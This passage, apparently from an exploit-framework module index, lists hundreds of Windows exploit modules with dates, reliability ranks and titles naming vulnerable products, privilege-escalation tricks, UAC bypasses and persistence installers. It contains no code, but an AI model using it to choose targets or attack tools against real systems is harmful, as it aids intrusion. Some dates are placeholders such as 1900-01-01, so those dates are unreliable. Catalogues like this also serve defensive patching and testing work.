Buffer Overflow - windows/http/hp_power_manager_login 2009-11-04 average No Hewlett-Packard Power Manager Administration Buffer Overflow - windows/http/hp_sitescope_dns_tool 2015-10-09 good No HP SiteScope DNS Tool Command Injection - windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution - windows/http/httpdx_handlepeer 2009-10-08 great Yes HTTPDX h_handlepeer() Function Buffer Overflow - windows/http/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability - windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow - windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good No IBM Tivoli Endpoint Manager POST Query Buffer Overflow - windows/http/ibm_tpmfosd_overflow 2007-05-02 good No IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow - windows/http/ibm_tsm_cad_header 2007-09-24 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow - windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite - windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow - windows/http/intersystems_cache 2009-09-29 great No InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow - windows/http/intrasrv_bof 2013-05-30 manual Yes Intrasrv 1.0 Buffer Overflow - windows/http/ipswitch_wug_maincfgret 2004-08-25 great No Ipswitch WhatsUp Gold 8.03 Buffer Overflow - windows/http/jira_collector_traversal 2014-02-26 normal Yes JIRA Issues Collector Directory Traversal - windows/http/kaseya_uploader 2015-09-23 excellent Yes Kaseya VSA uploader.aspx Arbitrary File Upload - windows/http/kaseya_uploadimage_file_upload 2013-11-11 excellent Yes Kaseya uploadImage Arbitrary File Upload - windows/http/kolibri_http 2010-12-26 good Yes Kolibri HTTP Server HEAD Buffer Overflow - windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent No LANDesk Lenovo ThinkManagement Console Remote Command Execution - windows/http/lexmark_markvision_gfd_upload 2014-12-09 excellent Yes Lexmark MarkVision Enterprise Arbitrary File Upload - windows/http/mailenable_auth_header 2005-04-24 great Yes MailEnable Authorization Header Buffer Overflow - windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution - windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE - windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution - windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution - windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability - windows/http/maxdb_webdbm_database 2006-08-29 good No MaxDB WebDBM Database Parameter Overflow - windows/http/maxdb_webdbm_get_overflow 2005-04-26 good No MaxDB WebDBM GET Buffer Overflow - windows/http/mcafee_epolicy_source 2006-07-17 average Yes McAfee ePolicy Orchestrator / ProtectionPilot Overflow - windows/http/mdaemon_worldclient_form2raw 2003-12-29 great Yes MDaemon WorldClient form2raw.cgi Stack Buffer Overflow - windows/http/minishare_get_overflow 2004-11-07 average No Minishare 1.4.1 Buffer Overflow - windows/http/miniweb_upload_wbem 2013-04-09 excellent Yes MiniWeb (Build 300) Arbitrary File Upload - windows/http/navicopa_get_overflow 2006-09-28 great Yes NaviCOPA 2.0.1 URL Handling Buffer Overflow - windows/http/netdecision_http_bof 2012-02-24 normal Yes NetDecision 4.5.1 HTTP Server Buffer Overflow - windows/http/netgear_nms_rce 2016-02-04 excellent Yes NETGEAR ProSafe Network Management System 300 Arbitrary File Upload - windows/http/novell_imanager_upload 2010-10-01 excellent No Novell iManager getMultiPartParameters Arbitrary File Upload - windows/http/novell_mdm_lfi 2013-03-13 excellent Yes Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability - windows/http/novell_messenger_acceptlang 2006-04-13 average No Novell Messenger Server 2.0 Accept-Language Overflow - windows/http/nowsms 2008-02-19 good No Now SMS/MMS Gateway Buffer Overflow - windows/http/octopusdeploy_deploy 2017-05-15 excellent Yes Octopus Deploy Authenticated Code Execution - windows/http/oracle9i_xdb_pass 2003-08-18 great Yes Oracle 9i XDB HTTP PASS Overflow (win32) - windows/http/oracle_beehive_evaluation 2010-06-09 excellent Yes Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability - windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Yes Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload - windows/http/oracle_btm_writetofile 2012-08-07 excellent No Oracle Business Transaction Management FlashTunnelService Remote Code Execution - windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution - windows/http/oracle_event_processing_upload 2014-04-21 excellent Yes Oracle Event Processing FileUploadServlet Arbitrary File Upload - windows/http/osb_uname_jlist 2010-07-13 excellent No Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability - windows/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow - windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow - windows/http/privatewire_gateway 2006-06-26 average No Private Wire Gateway Buffer Overflow - windows/http/psoproxy91_overflow 2004-02-20 average Yes PSO Proxy v0.91 Stack Buffer Overflow - windows/http/rabidhamster_r4_log 2012-02-09 normal Yes RabidHamster R4 Log Entry sprintf() Buffer Overflow - windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution - windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow - windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution - windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection - windows/http/sapdb_webtools 2007-07-05 great No SAP DB 7.4 WebTools Buffer Overflow - windows/http/savant_31_overflow 2002-09-10 great Yes Savant 3.1 Web Server Overflow - windows/http/sepm_auth_bypass_rce 2015-07-31 excellent No Symantec Endpoint Protection Manager Authentication Bypass and Code Execution - windows/http/serviio_checkstreamurl_cmd_exec 2017-05-03 excellent Yes Serviio Media Server checkStreamUrl Command Execution - windows/http/servu_session_cookie 2009-11-01 good Yes Rhinosoft Serv-U Session Cookie Buffer Overflow - windows/http/shoutcast_format 2004-12-23 average Yes SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow - windows/http/shttpd_post 2006-10-06 average No SHTTPD URI-Encoded POST Request Overflow - windows/http/solarwinds_fsm_userlogin 2015-03-13 excellent Yes Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability - windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Yes Solarwinds Storage Manager 5.1.0 SQL Injection - windows/http/sonicwall_scrutinizer_sqli 2012-07-22 excellent Yes Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection - windows/http/steamcast_useragent 2008-01-24 average Yes Streamcast HTTP User-Agent Buffer Overflow - windows/http/sws_connection_bof 2012-07-20 normal Yes Simple Web Server Connection Header Buffer Overflow - windows/http/sybase_easerver 2005-07-25 average No Sybase EAServer 5.2 Remote Stack Buffer Overflow - windows/http/syncbreeze_bof 2017-03-15 great Yes Sync Breeze Enterprise GET Buffer Overflow - windows/http/sysax_create_folder 2012-07-29 normal No Sysax Multi Server 5.64 Create Folder Buffer Overflow - windows/http/trackercam_phparg_overflow 2005-02-18 average Yes TrackerCam PHP Argument Buffer Overflow - windows/http/trackit_file_upload 2014-10-07 excellent Yes Numara / BMC Track-It! FileStorageService Arbitrary File Upload - windows/http/trendmicro_officescan 2007-06-28 good No Trend Micro OfficeScan Remote Stack Buffer Overflow - windows/http/trendmicro_officescan_widget_exec 2017-10-07 excellent Yes Trend Micro OfficeScan Remote Code Execution - windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow - windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution - windows/http/vmware_vcenter_chargeback_upload 2013-05-15 excellent Yes VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload - windows/http/vxsrchs_bof 2017-03-15 great Yes VX Search Enterprise GET Buffer Overflow - windows/http/webster_http 2002-12-02 average No Webster HTTP Server GET Buffer Overflow - windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload - windows/http/xitami_if_mod_since 2007-09-24 average Yes Xitami 2.5c2 Web Server If-Modified-Since Overflow - windows/http/zenworks_assetmgmt_uploadservlet 2011-11-02 excellent No Novell ZENworks Asset Management Remote Execution - windows/http/zenworks_uploadservlet 2010-03-30 excellent No Novell ZENworks Configuration Management Remote Execution - windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow - windows/iis/iis_webdav_upload_asp 1994-01-01 excellent No Microsoft IIS WebDAV Write Access Code Execution - windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow - windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution - windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow - windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow - windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow - windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow - windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution - windows/imap/eudora_list 2005-12-20 great Yes Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow - windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow - windows/imap/ipswitch_search 2007-07-18 average No Ipswitch IMail IMAP SEARCH Buffer Overflow - windows/imap/mailenable_login 2006-12-11 great No MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow - windows/imap/mailenable_status 2005-07-13 great No MailEnable IMAPD (1.54) STATUS Request Buffer Overflow - windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow - windows/imap/mdaemon_cram_md5 2004-11-12 great No Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow - windows/imap/mdaemon_fetch 2008-03-13 great Yes MDaemon 9.6.4 IMAPD FETCH Buffer Overflow - windows/imap/mercur_imap_select_overflow 2006-03-17 average No Mercur v5.0 IMAP SP3 SELECT Buffer Overflow - windows/imap/mercur_login 2006-03-17 average No Mercur Messaging 2005 IMAP Login Buffer Overflow - windows/imap/mercury_login 2007-03-06 normal Yes Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow - windows/imap/mercury_rename 2004-11-29 average Yes Mercury/32 v4.01a IMAP RENAME Buffer Overflow - windows/imap/novell_netmail_append 2006-12-23 average No Novell NetMail IMAP APPEND Buffer Overflow - windows/imap/novell_netmail_auth 2007-01-07 average No Novell NetMail IMAP AUTHENTICATE Buffer Overflow - windows/imap/novell_netmail_status 2005-11-18 average No Novell NetMail IMAP STATUS Buffer Overflow - windows/imap/novell_netmail_subscribe 2006-12-23 average No Novell NetMail IMAP SUBSCRIBE Buffer Overflow - windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow - windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow - windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow - windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow - windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow - windows/ldap/imail_thc 2004-02-17 average No IMail LDAP Service Buffer Overflow - windows/ldap/pgp_keyserver7 2001-07-16 good No Network Associates PGP KeyServer 7 LDAP Buffer Overflow - windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow - windows/license/calicserv_getconfig 2005-03-02 normal Yes Computer Associates License Server GETCONFIG Overflow - windows/license/flexnet_lmgrd_bof 2012-03-23 normal No FlexNet License Server Manager lmgrd Buffer Overflow - windows/license/sentinel_lm7_udp 2005-03-07 average Yes SentinelLM UDP Buffer Overflow - windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass - windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation - windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation - windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI - windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass - windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs - windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation - windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass - windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) - windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) - windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) - windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) - windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS - windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) - windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) - windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) - windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token - windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability - windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL - windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation - windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation - windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability - windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation - windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D - windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation - windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation - windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation - windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) - windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page - windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape - windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape - windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference - windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference - windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape - windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit - windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow - windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Recieve Notification Exploit - windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation - windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation - windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC - windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) - windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference - windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation - windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation - windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation - windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check - windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation - windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation - windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection - windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer - windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer - windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) - windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution - windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation - windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution - windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell - windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server - windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess - windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence - windows/local/run_as 1999-01-01 excellent No Windows Run Command As User - windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer - windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation - windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation - windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation - windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape - windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy - windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit - windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution - windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence - windows/lotus/domino_http_accept_language 2008-05-20 average No IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow - windows/lotus/domino_icalendar_organizer 2010-09-14 normal Yes IBM Lotus Domino iCalendar MAILTO Buffer Overflow - windows/lotus/domino_sametime_stmux 2008-05-21 average Yes IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow - windows/lotus/lotusnotes_lzh 2011-05-24 normal No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) - windows/lpd/hummingbird_exceed 2005-05-27 average No Hummingbird Connectivity 10 SP5 LPD Buffer Overflow - windows/lpd/niprint 2003-11-05 good No NIPrint LPD Request Overflow - windows/lpd/saplpd 2008-02-04 good No SAP SAPLPD 6.28 Buffer Overflow - windows/lpd/wincomlpd_admin 2008-02-04 good No WinComLPD Buffer Overflow - windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow - windows/misc/actfax_raw_server_bof 2013-02-05 normal No ActFax 5.01 RAW Server Buffer Overflow - windows/misc/agentxpp_receive_agentx 2010-04-16 good No AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow - windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow - windows/misc/altiris_ds_sqli 2008-05-15 normal Yes Symantec Altiris DS SQL Injection - windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal No Apple QuickTime 7.3 RTSP Response Header Buffer Overflow - windows/misc/asus_dpcproxy_overflow 2008-03-21 average No Asus Dpcproxy Buffer Overflow - windows/misc/avaya_winpmd_unihostrouter 2011-05-23 normal No Avaya WinPMD UniteHostRouter Buffer Overflow - windows/misc/avidphoneticindexer 2011-11-29 normal No Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow - windows/misc/bakbone_netvault_heap 2005-04-01 average Yes BakBone NetVault Remote Heap Overflow - windows/misc/bcaaa_bof 2011-04-04 good No Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow - windows/misc/bigant_server 2008-04-15 average No BigAnt Server 2.2 Buffer Overflow - windows/misc/bigant_server_250 2008-04-15 great No BigAnt Server 2.50 SP1 Buffer Overflow - windows/misc/bigant_server_dupf_upload 2013-01-09 excellent No BigAnt Server DUPF Command Arbitrary File Upload - windows/misc/bigant_server_sch_dupf_bof 2013-01-09 normal No BigAnt Server 2 SCH And DUPF Buffer Overflow - windows/misc/bigant_server_usv 2009-12-29 great No BigAnt Server 2.52 USV Buffer Overflow - windows/misc/bomberclone_overflow 2006-02-16 average No Bomberclone 0.11.6 Buffer Overflow - windows/misc/bopup_comm 2009-06-18 good No Bopup Communications Server Buffer Overflow - windows/misc/borland_interbase 2007-07-24 average No Borland Interbase Create-Request Buffer Overflow - windows/misc/borland_starteam 2008-04-02 average No Borland CaliberRM StarTeam Multicast Service Buffer Overflow - windows/misc/citrix_streamprocess 2011-01-20 good No Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow - windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow - windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow - windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow - windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow - windows/misc/cloudme_sync 2018-01-17 great No CloudMe Sync v1.10.9 - windows/misc/commvault_cmd_exec 2017-12-12 good No Commvault Communications Service (cvd) Command Injection - windows/misc/disk_savvy_adm 2017-01-31 great No Disk Savvy Enterprise v10.4.18 - windows/misc/doubletake 2008-06-04 average No DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow - windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow - windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow - windows/misc/enterasys_netsight_syslog_bof 2011-12-19 normal No Enterasys NetSight nssyslogd.exe Buffer Overflow - windows/misc/eureka_mail_err 2009-10-22 normal No Eureka Email 2.2q ERR Remote Buffer Overflow - windows/misc/fb_cnct_group 2013-01-31 normal Yes Firebird Relational Database CNCT Group Number Buffer Overflow - windows/misc/fb_isc_attach_database 2007-10-03 average No Firebird Relational Database isc_attach_database() Buffer Overflow - windows/misc/fb_isc_create_database 2007-10-03 average No Firebird Relational Database isc_create_database() Buffer Overflow - windows/misc/fb_svc_attach 2007-10-03 average No Firebird Relational Database SVC_attach() Buffer Overflow - windows/misc/gh0st 2017-07-27 normal Yes Gh0st Client buffer Overflow - windows/misc/gimp_script_fu 2012-05-18 normal No GIMP script-fu Server Buffer Overflow - windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution - windows/misc/hp_dataprotector_crs 2013-06-03 normal Yes HP Data Protector Cell Request Service Buffer Overflow - windows/misc/hp_dataprotector_dtbclslogin 2010-09-09 normal Yes HP Data Protector DtbClsLogin Buffer Overflow - windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution - windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution - windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service - windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow - windows/misc/hp_dataprotector_traversal 2014-01-02 great Yes HP Data Protector Backup Client Service Directory Traversal - windows/misc/hp_imc_dbman_restartdb_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestartDB Unauthenticated RCE - windows/misc/hp_imc_dbman_restoredbase_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestoreDBase Unauthenticated RCE - windows/misc/hp_imc_uam 2012-08-29 normal No HP Intelligent Management Center UAM Buffer Overflow - windows/misc/hp_loadrunner_magentproc 2013-07-27 normal No HP LoadRunner magentproc.exe Overflow - windows/misc/hp_loadrunner_magentproc_cmdexec 2010-05-06 excellent No HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution - windows/misc/hp_magentservice 2012-01-12 average No HP Diagnostics Server magentservice.exe Overflow - windows/misc/hp_omniinet_1 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow - windows/misc/hp_omniinet_2 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow - windows/misc/hp_omniinet_3 2011-06-29 great Yes HP OmniInet.exe Opcode 27 Buffer Overflow - windows/misc/hp_omniinet_4 2011-06-29 good No HP OmniInet.exe Opcode 20 Buffer Overflow - windows/misc/hp_operations_agent_coda_34 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow - windows/misc/hp_operations_agent_coda_8c 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow - windows/misc/hp_ovtrace 2007-08-09 average No HP OpenView Operations OVTrace Buffer Overflow - windows/misc/hta_server 2016-10-06 manual No HTA Web Server - windows/misc/ib_isc_attach_database 2007-10-03 good No Borland InterBase isc_attach_database() Buffer Overflow - windows/misc/ib_isc_create_database 2007-10-03 good No Borland InterBase isc_create_database() Buffer Overflow - windows/misc/ib_svc_attach 2007-10-03 good No Borland InterBase SVC_attach() Buffer Overflow - windows/misc/ibm_cognos_tm1admsd_bof 2012-04-02 normal No IBM Cognos tm1admsd.exe Overflow - windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection - windows/misc/ibm_tsm_cad_ping 2009-11-04 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow - windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great No IBM Tivoli Storage Manager Express RCA Service Buffer Overflow - windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability - windows/misc/itunes_extm3u_bof 2012-06-21 normal No Apple iTunes 10 Extended M3U Stack Buffer Overflow - windows/misc/landesk_aolnsrvr 2007-04-13 average No LANDesk Management Suite 8.7 Alert Service Buffer Overflow - windows/misc/lianja_db_net 2013-05-22 normal Yes Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow - windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution - windows/misc/mercury_phonebook 2005-12-19 average No Mercury/32 PH Server Module Buffer Overflow - windows/misc/mini_stream 2009-12-25 normal No Mini-Stream 3.0.1.1 Buffer Overflow - windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow - windows/misc/ms07_064_sami 2007-12-11 normal No MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow - windows/misc/ms10_104_sharepoint 2010-12-14 excellent Yes MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution - windows/misc/netcat110_nt 2004-12-27 great No Netcat v1.10 NT Stack Buffer Overflow - windows/misc/nettransport 2010-01-02 normal No NetTransport Download Manager 2.90.510 Buffer Overflow - windows/misc/nvidia_mental_ray 2013-12-10 excellent No Nvidia Mental Ray Satellite Service Arbitrary DLL Injection - windows/misc/plugx 2017-07-27 normal Yes PlugX Controller Stack Overflow - windows/misc/poisonivy_21x_bof 2016-06-03 normal Yes Poison Ivy 2.1.x C2 Buffer Overflow - windows/misc/poisonivy_bof 2012-06-24 normal Yes Poison Ivy Server Buffer Overflow - windows/misc/poppeeper_date 2009-02-27 normal No POP Peeper v3.4 DATE Buffer Overflow - windows/misc/poppeeper_uidl 2009-02-27 normal No POP Peeper v3.4 UIDL Buffer 